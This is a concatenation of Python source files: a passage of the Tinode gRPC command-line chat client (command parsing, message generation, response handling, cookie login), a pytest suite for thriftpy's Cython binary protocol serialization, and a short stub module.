    elif parts[0] == ".await" or parts[0] == ".must":
        # .await|.must [<$variable_name>] <waitable_command> <params>
        if len(parts) > 1:
            synchronous = True
            failOnError = parts[0] == ".must"
            if len(parts) > 2 and parts[1][0] == '$':
                # Varname is given; strip '.await/.must $var' and parse the rest.
                varname = parts[1]
                parts = parts[2:]
                parser = parse_cmd(parts)
            else:
                # No varname; strip just the '.await/.must' prefix.
                parts = parts[1:]
                parser = parse_cmd(parts)

    elif parts[0] == ".log":
        parser = argparse.ArgumentParser(prog=parts[0], description='Write value of a variable to stdout')
        parser.add_argument('varname', help='name of the variable to print')

    elif parts[0] == ".sleep":
        parser = argparse.ArgumentParser(prog=parts[0], description='Pause execution')
        parser.add_argument('millis', type=int, help='milliseconds to wait')

    elif parts[0] == ".verbose":
        parser = argparse.ArgumentParser(prog=parts[0], description='Toggle logging verbosity')

    else:
        # Not a dot-command: regular or macro command.
        parser = parse_cmd(parts)

    if not parser:
        printout("Unrecognized:", parts[0])
        printout("Possible commands:")
        printout("\t.await\t\t- wait for completion of an operation")
        printout("\t.exit\t\t- exit the program (also .quit)")
        printout("\t.log\t\t- write value of a variable to stdout")
        printout("\t.must\t\t- wait for completion of an operation, terminate on failure")
        printout("\t.sleep\t\t- pause execution")
        printout("\t.use\t\t- set default user (on_behalf_of) or topic")
        printout("\t.verbose\t- toggle logging verbosity on/off")
        printout("\tacc\t\t- create or alter an account")
        printout("\tdel\t\t- delete message(s), topic, subscription, or user")
        printout("\tget\t\t- query topic for metadata or messages")
        printout("\tleave\t\t- detach or unsubscribe from topic")
        printout("\tlogin\t\t- authenticate current session")
        printout("\tnote\t\t- send a notification")
        printout("\tpub\t\t- post message to topic")
        printout("\tset\t\t- update topic metadata")
        printout("\tsub\t\t- subscribe to topic")
        printout("\tupload\t\t- upload file out of band")
        printout("\tusermod\t\t- modify user account")
        printout("\n\tType <command> -h for help")
        if macros:
            printout("\nMacro commands:")
            for key in sorted(macros.Macros):
                macro = macros.Macros[key]
                printout("\t%s\t\t- %s" % (macro.name(), macro.description()))
        return None

    try:
        args = parser.parse_args(parts[1:])
        args.cmd = parts[0]
        args.synchronous = synchronous
        args.failOnError = failOnError
        if varname:
            args.varname = varname
        return args
    except SystemExit:
        # argparse calls sys.exit() on bad arguments / -h; treat as "no command".
        return None
# Process command-line input string: execute local commands, generate
# protobuf messages for remote commands.
def serialize_cmd(string, id, args):
    """Take string read from the command line, convert in into a protobuf message.

    Returns a (message, command) pair:
      * (pb.ClientMsg, Namespace) for commands that go to the server;
      * (True, Namespace) when work was started but nothing should be sent
        now (uploads);
      * (True, list) when a macro expanded into more command lines;
      * (None, None) for purely local commands and on any error.
    """
    # Map of remote command verbs to their protobuf message constructors.
    messages = {
        "acc": accMsg,
        "login": loginMsg,
        "sub": subMsg,
        "leave": leaveMsg,
        "pub": pubMsg,
        "get": getMsg,
        "set": setMsg,
        "del": delMsg,
        "note": noteMsg,
    }
    try:
        # Convert string into a dictionary
        cmd = parse_input(string)
        if cmd == None:
            return None, None

        # Process dictionary: local dot-commands are executed right here.
        if cmd.cmd == ".log":
            stdoutln(getVar(cmd.varname))
            return None, None

        elif cmd.cmd == ".use":
            # "unchanged" is the sentinel default meaning "flag not given".
            if cmd.user != "unchanged":
                if cmd.user:
                    if len(cmd.user) > 3 and cmd.user.startswith("usr"):
                        tn_globals.DefaultUser = cmd.user
                    else:
                        stdoutln("Error: user ID '{}' is invalid".format(cmd.user))
                else:
                    tn_globals.DefaultUser = None
                stdoutln("Default user='{}'".format(tn_globals.DefaultUser))

            if cmd.topic != "unchanged":
                if cmd.topic:
                    if cmd.topic[:3] in ['me', 'fnd', 'sys', 'usr', 'grp', 'chn']:
                        tn_globals.DefaultTopic = cmd.topic
                    else:
                        stdoutln("Error: topic '{}' is invalid".format(cmd.topic))
                else:
                    tn_globals.DefaultTopic = None
                stdoutln("Default topic='{}'".format(tn_globals.DefaultTopic))

            return None, None

        elif cmd.cmd == ".sleep":
            stdoutln("Pausing for {}ms...".format(cmd.millis))
            time.sleep(cmd.millis/1000.)
            return None, None

        elif cmd.cmd == ".verbose":
            tn_globals.Verbose = not tn_globals.Verbose
            stdoutln("Logging is {}".format("verbose" if tn_globals.Verbose else "normal"))
            return None, None

        elif cmd.cmd == "upload":
            # Start async upload; no_yield tells gen_message not to send anything.
            upload_thread = threading.Thread(target=upload, args=(id, derefVals(cmd), args), name="Uploader_"+cmd.filename)
            upload_thread.start()
            cmd.no_yield = True
            return True, cmd

        elif cmd.cmd in messages:
            # Remote command: build the protobuf message, dereferencing $variables.
            return messages[cmd.cmd](id, derefVals(cmd), args), cmd

        elif macros and cmd.cmd in messages is False or (macros and cmd.cmd in macros.Macros):
            return True, macros.Macros[cmd.cmd].run(id, derefVals(cmd), args)

        else:
            stdoutln("Error: unrecognized: '{}'".format(cmd.cmd))
            return None, None

    except Exception as err:
        stdoutln("Error in '{0}': {1}".format(cmd.cmd, err))
        return None, None
def pop_from_output_queue():
    """Print one pending server response, if any.

    Returns False when the output queue was empty, True after printing one
    queued line.
    """
    queue = tn_globals.OutputQueue
    if queue.empty():
        return False
    out = sys.stdout
    out.write("\r<= " + queue.get())
    out.flush()
    return True
# Generator of protobuf messages.
def gen_message(scheme, secret, args):
    """Client message generator: reads user input as string,
    converts to pb.ClientMsg, and yields.

    The generator is consumed by the gRPC MessageLoop stream: it first yields
    the {hi} handshake, optionally a {login}, then loops yielding one message
    per user command while interleaving queued server output and the prompt.
    """
    random.seed()
    id = random.randint(10000,60000)

    # Asynchronous input-output: stdin is read on a daemon thread so this
    # generator never blocks the gRPC stream.
    tn_globals.InputThread = threading.Thread(target=stdin, args=(tn_globals.InputQueue,))
    tn_globals.InputThread.daemon = True
    tn_globals.InputThread.start()

    # The {hi} handshake is always the first message.
    msg = hiMsg(id, args.background)
    if tn_globals.Verbose:
        stdoutln("\r=> " + to_json(msg))
    yield msg

    if scheme != None:
        id += 1
        # Bare callable used as an attribute bag for loginMsg()'s expected shape.
        login = lambda:None
        setattr(login, 'scheme', scheme)
        setattr(login, 'secret', secret)
        setattr(login, 'cred', None)
        msg = loginMsg(id, login, args)
        if tn_globals.Verbose:
            stdoutln("\r=> " + to_json(msg))
        yield msg

    print_prompt = True

    while True:
        try:
            # Only consume new input when not waiting on an .await/.must command.
            if not tn_globals.WaitingFor and tn_globals.InputQueue:
                id += 1
                inp = tn_globals.InputQueue.popleft()

                if inp == 'exit' or inp == 'quit' or inp == '.exit' or inp == '.quit':
                    # Drain the output queue.
                    while pop_from_output_queue():
                        pass
                    return

                pbMsg, cmd = serialize_cmd(inp, id, args)
                print_prompt = tn_globals.IsInteractive
                if isinstance(cmd, list):
                    # Push the expanded macro back on the command queue.
                    tn_globals.InputQueue.extendleft(reversed(cmd))
                    continue

                if pbMsg != None:
                    # Echo commands in scripted mode so logs stay readable.
                    if not tn_globals.IsInteractive:
                        sys.stdout.write("=> " + inp + "\n")
                        sys.stdout.flush()

                    if cmd.synchronous:
                        cmd.await_ts = time.time()
                        cmd.await_id = str(id)
                        tn_globals.WaitingFor = cmd

                    # Commands flagged no_yield (uploads) send nothing here.
                    if not hasattr(cmd, 'no_yield'):
                        if tn_globals.Verbose:
                            stdoutln("\r=> " + to_json(pbMsg))
                        yield pbMsg

            elif not tn_globals.OutputQueue.empty():
                pop_from_output_queue()
                print_prompt = tn_globals.IsInteractive

            else:
                if print_prompt:
                    sys.stdout.write("tn> ")
                    sys.stdout.flush()
                    print_prompt = False
                if tn_globals.WaitingFor:
                    # Give up on a synchronous command after AWAIT_TIMEOUT.
                    if time.time() - tn_globals.WaitingFor.await_ts > AWAIT_TIMEOUT:
                        stdoutln("Timeout while waiting for '{0}' response".format(tn_globals.WaitingFor.cmd))
                        tn_globals.WaitingFor = None
                # Poll more aggressively in scripted mode.
                if tn_globals.IsInteractive:
                    time.sleep(0.1)
                else:
                    time.sleep(0.01)

        except Exception as err:
            stdoutln("Exception in generator: {0}".format(err))
# Handle {ctrl} server response
def handle_ctrl(ctrl):
    """Process a {ctrl} server message.

    Runs the registered completion callback (success codes only), resolves a
    pending .await/.must wait, and prints the status line. Raises when a
    .must command failed (code >= 400).
    """
    # Run code on command completion
    func = tn_globals.OnCompletion.get(ctrl.id)
    if func:
        del tn_globals.OnCompletion[ctrl.id]
        # 2xx/3xx are success codes; run the callback only then.
        if ctrl.code >= 200 and ctrl.code < 400:
            func(ctrl.params)

    if tn_globals.WaitingFor and tn_globals.WaitingFor.await_id == ctrl.id:
        # WaitingFor is an argparse.Namespace; 'in' works via its __contains__.
        if 'varname' in tn_globals.WaitingFor:
            tn_globals.Variables[tn_globals.WaitingFor.varname] = ctrl
        if tn_globals.WaitingFor.failOnError and ctrl.code >= 400:
            raise Exception(str(ctrl.code) + " " + ctrl.text)
        tn_globals.WaitingFor = None

    topic = " (" + str(ctrl.topic) + ")" if ctrl.topic else ""
    stdoutln("\r<= " + str(ctrl.code) + " " + ctrl.text + topic)
# The main processing loop: send messages to server, receive responses.
def run(args, schema, secret):
    """Connect to the gRPC server and pump messages until the stream ends.

    Feeds gen_message() into the server's MessageLoop and prints every
    response by type. Returns 0 on clean shutdown, 1 on failure.
    """
    failed = False
    # Initialize before the try so the finally-block can always reference it
    # (the original left 'channel' unbound if PromptSession() raised).
    channel = None
    try:
        if tn_globals.IsInteractive:
            tn_globals.Prompt = PromptSession()
        # Create secure channel with default credentials.
        if args.ssl:
            opts = (('grpc.ssl_target_name_override', args.ssl_host),) if args.ssl_host else None
            channel = grpc.secure_channel(args.host, grpc.ssl_channel_credentials(), opts)
        else:
            channel = grpc.insecure_channel(args.host)

        # Call the server
        stream = pbx.NodeStub(channel).MessageLoop(gen_message(schema, secret, args))

        # Read server responses
        for msg in stream:
            if tn_globals.Verbose:
                stdoutln("\r<= " + to_json(msg))

            if msg.HasField("ctrl"):
                handle_ctrl(msg.ctrl)

            elif msg.HasField("meta"):
                what = []
                if len(msg.meta.sub) > 0:
                    what.append("sub")
                if msg.meta.HasField("desc"):
                    what.append("desc")
                if msg.meta.HasField("del"):
                    what.append("del")
                if len(msg.meta.tags) > 0:
                    what.append("tags")
                stdoutln("\r<= meta " + ",".join(what) + " " + msg.meta.topic)

                # Resolve a pending .await/.must wait on this meta message.
                if tn_globals.WaitingFor and tn_globals.WaitingFor.await_id == msg.meta.id:
                    if 'varname' in tn_globals.WaitingFor:
                        tn_globals.Variables[tn_globals.WaitingFor.varname] = msg.meta
                    tn_globals.WaitingFor = None

            elif msg.HasField("data"):
                stdoutln("\n\rFrom: " + msg.data.from_user_id)
                stdoutln("Topic: " + msg.data.topic)
                stdoutln("Seq: " + str(msg.data.seq_id))
                if msg.data.head:
                    stdoutln("Headers:")
                    for key in msg.data.head:
                        stdoutln("\t" + key + ": "+str(msg.data.head[key]))
                stdoutln(json.loads(msg.data.content))

            elif msg.HasField("pres"):
                # 'ON', 'OFF', 'UA', 'UPD', 'GONE', 'ACS', 'TERM', 'MSG', 'READ', 'RECV', 'DEL', 'TAGS'
                what = pb.ServerPres.What.Name(msg.pres.what)
                stdoutln("\r<= pres " + what + " " + msg.pres.topic)

            elif msg.HasField("info"):
                switcher = {
                    pb.READ: 'READ',
                    pb.RECV: 'RECV',
                    pb.KP: 'KP'
                }
                # BUG FIX: the original appended ' (' + msg.topic + ')', but the
                # server message has no top-level 'topic' field (only ctrl/data/
                # pres/meta/info are handled above), so every {info} raised
                # AttributeError and aborted the receive loop. The topic is
                # already reported from msg.info.topic.
                stdoutln("\rMessage #" + str(msg.info.seq_id) + " " + switcher.get(msg.info.what, "unknown") +
                    " by " + msg.info.from_user_id + "; topic=" + msg.info.topic)

            else:
                stdoutln("\rMessage type not handled" + str(msg))

    except grpc.RpcError as err:
        printerr("gRPC failed with {0}: {1}".format(err.code(), err.details()))
        failed = True
    except Exception as ex:
        printerr("Request failed: {0}".format(ex))
        failed = True
    finally:
        printout('Shutting down...')
        if channel is not None:
            channel.close()
        if tn_globals.InputThread != None:
            tn_globals.InputThread.join(0.3)

    return 1 if failed else 0
# Read cookie file for logging in with the cookie.
def read_cookie():
    """Return the auth token stored in '.tn-cli-cookie', or None.

    Prints an error and returns None when the file is missing or malformed.
    """
    try:
        # 'with' closes the file even when json.load() raises (the original
        # leaked the handle on a parse error).
        with open('.tn-cli-cookie', 'r') as cookie:
            params = json.load(cookie)
        return params.get("token")
    except Exception as err:
        printerr("Missing or invalid cookie file '.tn-cli-cookie'", err)
        return None
# Handler for a successful login response.
def handle_login(params):
    """Convert the {ctrl} login response params into a plain dict.

    The protobuf map is decoded (each value is a JSON string), the auth token
    is cached in tn_globals.AuthToken, and the decoded dict is returned.
    Returns None when params is None.
    """
    if params is None:
        return None
    # Protobuf map 'params' is a map which is not a python object or a dictionary. Convert it.
    nice = {p: json.loads(params[p]) for p in params}
    stdoutln("Authenticated as", nice.get('user'))
    tn_globals.AuthToken = nice.get('token')
    return nice
# Save cookie to file after successful login.
def save_cookie(params):
    """Persist decoded login params to '.tn-cli-cookie'.

    No-op when params is None; failures are logged, not raised.
    """
    if params is None:
        return
    try:
        # 'with' guarantees the file is closed even if handle_login()/dump raise
        # (the original leaked the handle on error).
        with open('.tn-cli-cookie', 'w') as cookie:
            json.dump(handle_login(params), cookie)
    except Exception as err:
        stdoutln("Failed to save authentication cookie", err)
# Log server info.
def print_server_params(params):
    """Print the server's handshake parameters as one '; '-separated line."""
    rendered = "; ".join(
        key + ": " + str(json.loads(params[key])) for key in params)
    stdoutln("\r<= Connected to server: " + rendered)
if __name__ == '__main__':
    # Parse command-line arguments. Extract host name and authentication
    # scheme, if one is provided.
    version = APP_VERSION + "/" + LIB_VERSION + "; gRPC/" + GRPC_VERSION + "; Python " + platform.python_version()
    purpose = "Tinode command line client. Version " + version + "."

    parser = argparse.ArgumentParser(description=purpose)
    parser.add_argument('--host', default='localhost:16060', help='address of Tinode gRPC server')
    parser.add_argument('--web-host', default='localhost:6060', help='address of Tinode web server (for file uploads)')
    parser.add_argument('--ssl', action='store_true', help='connect to server over secure connection')
    parser.add_argument('--ssl-host', help='SSL host name to use instead of default (useful for connecting to localhost)')
    parser.add_argument('--login-basic', help='login using basic authentication username:password')
    parser.add_argument('--login-token', help='login using token authentication')
    parser.add_argument('--login-cookie', action='store_true', help='read token from cookie file and use it for authentication')
    parser.add_argument('--no-login', action='store_true', help='do not login even if cookie file is present; default in non-interactive (scripted) mode')
    parser.add_argument('--no-cookie', action='store_true', help='do not save login cookie; default in non-interactive (scripted) mode')
    parser.add_argument('--api-key', default='AQEAAAABAAD_rAp4DJh05a1HAwFT3A6K', help='API key for file uploads')
    parser.add_argument('--load-macros', default='./macros.py', help='path to macro module to load')
    parser.add_argument('--version', action='store_true', help='print version')
    parser.add_argument('--verbose', action='store_true', help='log full JSON representation of all messages')
    # BUG FIX: corrected typos in the user-facing help text
    # ("sessionin" -> "session in", "non-intractive" -> "non-interactive").
    parser.add_argument('--background', action='store_const', const=True, help='start interactive session in background (non-interactive is always in background)')
    args = parser.parse_args()

    if args.version:
        printout(version)
        exit()

    if args.verbose:
        tn_globals.Verbose = True

    printout(purpose)
    printout("Secure server" if args.ssl else "Server", "at '"+args.host+"'",
        "SNI="+args.ssl_host if args.ssl_host else "")

    # Pick authentication scheme and secret, if any.
    schema = None
    secret = None
    if not args.no_login:
        if args.login_token:
            # Use token to login.
            schema = 'token'
            secret = args.login_token.encode('ascii')
            printout("Logging in with token", args.login_token)
        elif args.login_basic:
            # Use username:password.
            schema = 'basic'
            secret = args.login_basic
            printout("Logging in with login:password", args.login_basic)
        elif tn_globals.IsInteractive:
            # Interactive mode only: try reading the cookie file.
            printout("Logging in with cookie file")
            schema = 'token'
            secret = read_cookie()
            if not secret:
                schema = None

    # Attempt to load the macro file if available.
    macros = None
    if args.load_macros:
        import importlib
        # NOTE(review): import_module's second argument is a *package* name for
        # relative imports, not a file path, so the --load-macros path is
        # effectively ignored and 'macros' is imported from sys.path. Confirm
        # intent; importlib.util.spec_from_file_location would load from a path.
        macros = importlib.import_module('macros', args.load_macros) if args.load_macros else None

    # Check if background session is specified explicitly. If not set it to
    # True for non-interactive sessions.
    if args.background is None and not tn_globals.IsInteractive:
        args.background = True

    sys.exit(run(args, schema, secret))
|
test_protocol_cybinary.py | # -*- coding: utf-8 -*-
import collections
import multiprocessing
import os
import time
import pytest
from thriftpy._compat import u
from thriftpy.thrift import TType, TPayload, TDecodeException
from thriftpy.transport import TSocket, TServerSocket
from thriftpy.utils import hexlify
from thriftpy._compat import PYPY
# cybin and the Cython transports exist only in the CPython build, so the
# whole module is skipped (and the imports avoided) under PyPy.
pytestmark = pytest.mark.skipif(PYPY,
                                reason="cython not enabled in pypy.")

if not PYPY:
    from thriftpy.protocol import cybin as proto
    from thriftpy.transport.memory import TCyMemoryBuffer
    from thriftpy.transport.buffered import TCyBufferedTransport
class TItem(TPayload):
    """Two-field struct (i32 id, list<string> phones) used as the shared
    fixture throughout these tests."""
    thrift_spec = {
        1: (TType.I32, "id", False),
        2: (TType.LIST, "phones", TType.STRING, False),
    }
    default_spec = [("id", None), ("phones", None)]
# --- Primitive type round-trips --------------------------------------------
# Each write_* test serializes one value into a TCyMemoryBuffer and checks
# the exact big-endian wire bytes; each read_* test decodes hand-written
# bytes back into the value.

def test_write_bool():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.BOOL, 1)
    b.flush()
    assert "01" == hexlify(b.getvalue())


def test_read_bool():
    b = TCyMemoryBuffer(b'\x01')
    val = proto.read_val(b, TType.BOOL)
    assert True is val


def test_write_i8():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.I08, 123)
    b.flush()
    assert "7b" == hexlify(b.getvalue())


def test_read_i8():
    b = TCyMemoryBuffer(b'\x7b')
    val = proto.read_val(b, TType.I08)
    assert 123 == val


def test_write_i16():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.I16, 12345)
    b.flush()
    assert "30 39" == hexlify(b.getvalue())


def test_read_i16():
    # b"09" is the ASCII bytes 0x30 0x39, i.e. 12345 big-endian.
    b = TCyMemoryBuffer(b"09")
    val = proto.read_val(b, TType.I16)
    assert 12345 == val


def test_byteswap_i16():
    # Round-trip to verify endianness conversion is symmetric.
    i = 128
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.I16, i)
    b.flush()
    v = proto.read_val(b, TType.I16)
    assert v == i


def test_write_i32():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.I32, 1234567890)
    b.flush()
    assert "49 96 02 d2" == hexlify(b.getvalue())


def test_read_i32():
    b = TCyMemoryBuffer(b"I\x96\x02\xd2")
    assert 1234567890 == proto.read_val(b, TType.I32)


def test_write_i64():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.I64, 1234567890123456789)
    b.flush()
    assert "11 22 10 f4 7d e9 81 15" == hexlify(b.getvalue())


def test_read_i64():
    b = TCyMemoryBuffer(b"\x11\"\x10\xf4}\xe9\x81\x15")
    assert 1234567890123456789 == proto.read_val(b, TType.I64)


def test_write_double():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.DOUBLE, 1234567890.1234567890)
    b.flush()
    assert "41 d2 65 80 b4 87 e6 b7" == hexlify(b.getvalue())


def test_read_double():
    b = TCyMemoryBuffer(b"A\xd2e\x80\xb4\x87\xe6\xb7")
    assert 1234567890.1234567890 == proto.read_val(b, TType.DOUBLE)


def test_write_string():
    # Strings are a 4-byte length prefix followed by UTF-8 bytes.
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.STRING, "hello world!")
    b.flush()
    assert "00 00 00 0c 68 65 6c 6c 6f 20 77 6f 72 6c 64 21" == \
        hexlify(b.getvalue())

    b = TCyMemoryBuffer()
    proto.write_val(b, TType.STRING, u("你好世界"))
    b.flush()
    assert "00 00 00 0c e4 bd a0 e5 a5 bd e4 b8 96 e7 95 8c" == \
        hexlify(b.getvalue())


def test_read_string():
    b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
                        b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
    assert u("你好世界") == proto.read_val(b, TType.STRING)


def test_read_binary():
    # decode_response=False returns the raw bytes, not a decoded str.
    b = TCyMemoryBuffer(b"\x00\x00\x00\x0c"
                        b"\xe4\xbd\xa0\xe5\xa5\xbd\xe4\xb8\x96\xe7\x95\x8c")
    assert u("你好世界").encode("utf-8") == proto.read_val(
        b, TType.STRING, decode_response=False)


# --- Message envelope -------------------------------------------------------

def test_write_message_begin():
    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans)
    b.write_message_begin("test", TType.STRING, 1)
    b.write_message_end()
    assert "80 01 00 0b 00 00 00 04 74 65 73 74 00 00 00 01" == \
        hexlify(trans.getvalue())


def test_write_message_begin_no_strict():
    # Non-strict framing: no version word, type byte after the name.
    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans, strict_write=False)
    b.write_message_begin("test", TType.STRING, 1)
    b.write_message_end()
    assert "00 00 00 04 74 65 73 74 0b 00 00 00 01" == \
        hexlify(trans.getvalue())


def test_read_message_begin():
    b = TCyMemoryBuffer(b"\x80\x01\x00\x0b\x00\x00\x00\x04test"
                        b"\x00\x00\x00\x01")
    res = proto.TCyBinaryProtocol(b).read_message_begin()
    assert res == ("test", TType.STRING, 1)


def test_read_message_begin_not_strict():
    b = TCyMemoryBuffer(b"\x00\x00\x00\x04test\x0b\x00\x00\x00\x01")
    res = proto.TCyBinaryProtocol(b, strict_read=False).read_message_begin()
    assert res == ("test", TType.STRING, 1)
# --- Struct serialization ---------------------------------------------------

def test_write_struct():
    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans)
    item = TItem(id=123, phones=["123456", "abcdef"])
    b.write_struct(item)
    b.write_message_end()
    assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
            "06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
        hexlify(trans.getvalue())


def test_read_struct():
    b = TCyMemoryBuffer(b"\x08\x00\x01\x00\x00\x00{"
                        b"\x0f\x00\x02\x0b\x00\x00\x00"
                        b"\x02\x00\x00\x00\x06123456"
                        b"\x00\x00\x00\x06abcdef\x00")
    b = proto.TCyBinaryProtocol(b)
    _item = TItem(id=123, phones=["123456", "abcdef"])
    _item2 = TItem()
    b.read_struct(_item2)
    assert _item == _item2


def test_write_empty_struct():
    # An empty struct serializes to just the stop byte.
    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans)
    item = TItem()
    b.write_struct(item)
    b.write_message_end()
    assert "00" == hexlify(trans.getvalue())


def test_read_empty_struct():
    b = TCyMemoryBuffer(b"\x00")
    b = proto.TCyBinaryProtocol(b)
    _item = TItem()
    _item2 = TItem()
    b.read_struct(_item2)
    assert _item == _item2


def test_write_huge_struct():
    # Smoke test: a very large struct must serialize without error.
    b = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(b)
    item = TItem(id=12345, phones=["1234567890"] * 100000)
    b.write_struct(item)
    b.write_message_end()


def test_read_huge_args():
    # Smoke test: round-trip a struct with large multi-byte string fields.
    class Hello(TPayload):
        thrift_spec = {
            1: (TType.STRING, "name", False),
            2: (TType.STRING, "world", False),
        }
        default_spec = [("name", None), ("world", None)]

    b = TCyMemoryBuffer()
    item = Hello(name='我' * 326, world='你' * 1365)
    p = proto.TCyBinaryProtocol(b)
    p.write_struct(item)
    p.write_message_end()

    item2 = Hello()
    p.read_struct(item2)


# --- skip() -----------------------------------------------------------------
# Each test writes a value followed by an i32 sentinel, skips the value, then
# checks the sentinel reads correctly — i.e. skip consumed exactly the
# value's bytes.

def test_skip_bool():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.BOOL, 1)
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.BOOL)
    assert 123 == proto.read_val(b, TType.I32)


def test_skip_double():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.DOUBLE, 0.123425897)
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.DOUBLE)
    assert 123 == proto.read_val(b, TType.I32)


def test_skip_string():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.STRING, "hello world")
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.STRING)
    assert 123 == proto.read_val(b, TType.I32)


def test_skip_list():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.LIST, [5, 6, 7, 8, 9], spec=TType.I32)
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.LIST)
    assert 123 == proto.read_val(b, TType.I32)


def test_skip_map():
    b = TCyMemoryBuffer()
    proto.write_val(b, TType.MAP, {"hello": 0.3456},
                    spec=(TType.STRING, TType.DOUBLE))
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.MAP)
    assert 123 == proto.read_val(b, TType.I32)


def test_skip_struct():
    b = TCyMemoryBuffer()
    p = proto.TCyBinaryProtocol(b)
    item = TItem(id=123, phones=["123456", "abcdef"])
    p.write_struct(item)
    p.write_message_end()
    proto.write_val(b, TType.I32, 123)
    b.flush()
    proto.skip(b, TType.STRUCT)
    assert 123 == proto.read_val(b, TType.I32)
def test_read_long_data():
    # Push ~97 KiB through a unix socket to exercise the buffered transport's
    # multi-read path; the writer runs in a separate process.
    val = 'z' * 97 * 1024
    unix_sock = "/tmp/thriftpy_test.sock"

    def serve():
        server_sock = TServerSocket(unix_socket=unix_sock)
        server_sock.listen()
        client = server_sock.accept()
        t = TCyBufferedTransport(client)
        proto.write_val(t, TType.STRING, val)
        t.flush()
        # wait for client to read
        time.sleep(1)

    p = multiprocessing.Process(target=serve)
    p.start()
    time.sleep(0.1)

    try:
        sock = TSocket(unix_socket=unix_sock)
        b = TCyBufferedTransport(sock)
        b.open()
        assert val == proto.read_val(b, TType.STRING)
        sock.close()
    finally:
        p.terminate()
        try:
            os.remove(unix_sock)
        except IOError:
            pass


def test_write_wrong_arg_type():
    # A failed write must not corrupt the transport for subsequent writes.
    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans)
    item = TItem(id="wrong type", phones=["123456", "abcdef"])
    try:
        b.write_struct(item)
    except Exception:
        pass
    b.write_message_end()

    item2 = TItem(id=123, phones=["123456", "abcdef"])
    b.write_struct(item2)
    b.write_message_end()
    assert ("08 00 01 00 00 00 7b 0f 00 02 0b 00 00 00 02 00 00 00 "
            "06 31 32 33 34 35 36 00 00 00 06 61 62 63 64 65 66 00") == \
        hexlify(trans.getvalue())


def test_read_wrong_arg_type():
    # A failed read must not corrupt the protocol for subsequent reads.
    class TWrongTypeItem(TPayload):
        thrift_spec = {
            1: (TType.STRING, "id", False),
            2: (TType.LIST, "phones", TType.STRING, False),
        }
        default_spec = [("id", None), ("phones", None)]

    trans = TCyMemoryBuffer()
    b = proto.TCyBinaryProtocol(trans)

    item = TItem(id=58, phones=["123456", "abcdef"])
    b.write_struct(item)
    b.write_message_end()

    item2 = TWrongTypeItem()
    try:
        b.read_struct(item2)
    except Exception:
        pass

    item3 = TItem(id=123, phones=["123456", "abcdef"])
    b.write_struct(item3)
    b.write_message_end()

    item4 = TItem()
    b.read_struct(item4)
    assert item3 == item4


def test_multiple_read_struct():
    # Two structs written back-to-back must read back in order.
    t = TCyMemoryBuffer()
    p = proto.TCyBinaryProtocol(t)

    item1 = TItem(id=123, phones=["123456", "abcdef"])
    item2 = TItem(id=234, phones=["110", "120"])
    p.write_struct(item1)
    p.write_struct(item2)
    p.write_message_end()

    _item1 = TItem()
    _item2 = TItem()
    p.read_struct(_item1)
    p.read_struct(_item2)
    assert _item1 == item1 and _item2 == item2
def test_write_decode_error():
    # Mistyped field values must raise TDecodeException with an exact,
    # user-readable message naming the field, its spec type, and the value.
    t = TCyMemoryBuffer()
    p = proto.TCyBinaryProtocol(t)

    class T(TPayload):
        thrift_spec = {
            1: (TType.I32, "id", False),
            2: (TType.LIST, "phones", TType.STRING, False),
            3: (TType.STRUCT, "item", TItem, False),
            4: (TType.MAP, "mm", (TType.STRING, (TType.STRUCT, TItem)), False)
        }
        default_spec = [("id", None), ("phones", None), ("item", None),
                        ("mm", None)]

    cases = [
        (T(id="hello"), "Field 'id(1)' of 'T' needs type 'I32', but the value is `'hello'`"),  # noqa
        (T(phones=[90, 12]), "Field 'phones(2)' of 'T' needs type 'LIST<STRING>', but the value is `[90, 12]`"),  # noqa
        (T(item=12), "Field 'item(3)' of 'T' needs type 'TItem', but the value is `12`"),  # noqa
        (T(mm=[45, 56]), "Field 'mm(4)' of 'T' needs type 'MAP<STRING, TItem>', but the value is `[45, 56]`")  # noqa
    ]

    for obj, res in cases:
        with pytest.raises(TDecodeException) as exc:
            p.write_struct(obj)
        assert str(exc.value) == res


def test_type_tolerance():
    # Any iterable/mapping of the right shape is accepted for LIST/MAP
    # fields (tuples, sets, dict keys, defaultdicts) — write must not raise.
    t = TCyMemoryBuffer()
    p = proto.TCyBinaryProtocol(t)

    class T(TPayload):
        thrift_spec = {
            1: (TType.LIST, "phones", TType.STRING, False),
            2: (TType.MAP, "mm", (TType.I32, (TType.LIST, TType.I32)), False)
        }
        default_spec = [("phones", None), ("mm", None)]

    defaultdict = collections.defaultdict(list)
    defaultdict.update({234: [3, 4, 5], 123: [6, 7, 8]})

    cases = [
        T(phones=["123", "234"]),
        T(phones=("123", "234")),
        T(phones={"123", "234"}),
        T(phones={"123": 'a', "234": 'b'}),
        T(mm={234: [3, 4, 5], 123: [6, 7, 8]}),
        T(mm=collections.defaultdict(list)),
        T(mm=defaultdict)
    ]

    for obj in cases:
        p.write_struct(obj)
|
main.py | from helpers import setup_logger
menu_name = "Wireless"
i = None
